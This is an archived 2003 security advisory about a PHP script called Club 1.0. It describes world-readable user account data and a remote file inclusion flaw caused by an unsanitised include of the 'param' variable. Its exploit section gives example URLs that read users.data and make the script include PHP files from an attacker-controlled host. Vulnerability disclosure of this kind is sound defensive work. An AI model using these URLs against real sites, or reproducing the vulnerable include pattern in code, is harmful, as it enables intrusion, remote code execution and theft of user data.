logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

Club PHP Source Code Injection
Date: 2003-04-01

Author : subj <r2subj3ct@dwclan.org>

Product : Club
Version : 1.0
WebSite : http://www.lyanguzov.inc.ru
Problem :
* Viewing users accounts
* PHP Source Code Injection

Description:
------------

[Viewing users accounts]:

All info about users in Club system are in users.data file

club.php:
=========
[...]

$name = "users.data";

$fill="$name";
$test = file("$fill");
$size = sizeof($test);
$si = $size;
$sizeres = $size;

[...]
=========

************************************************************
[PHP Source Code Injection]:

club.php:
=========

include "$param";

=========

menu.txt:
=========

<br>
&nbsp;<img src=str.gif>&nbsp;<a href=club.php?p=3&param=main.php target=main>
&nbsp;<img src=str.gif>&nbsp;<a href=club.php?p=3&param=guestbook.php target=main>

=========


Exploit:
--------

http://[somehost]/club/users.data
http://[somehost]/club/club.php?p=param=http://[attacker]
with:
http://[attacker]/main.php
http://[attacker]/guestbook.php

Contacts:
---------

r2subj3ct@dwclan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy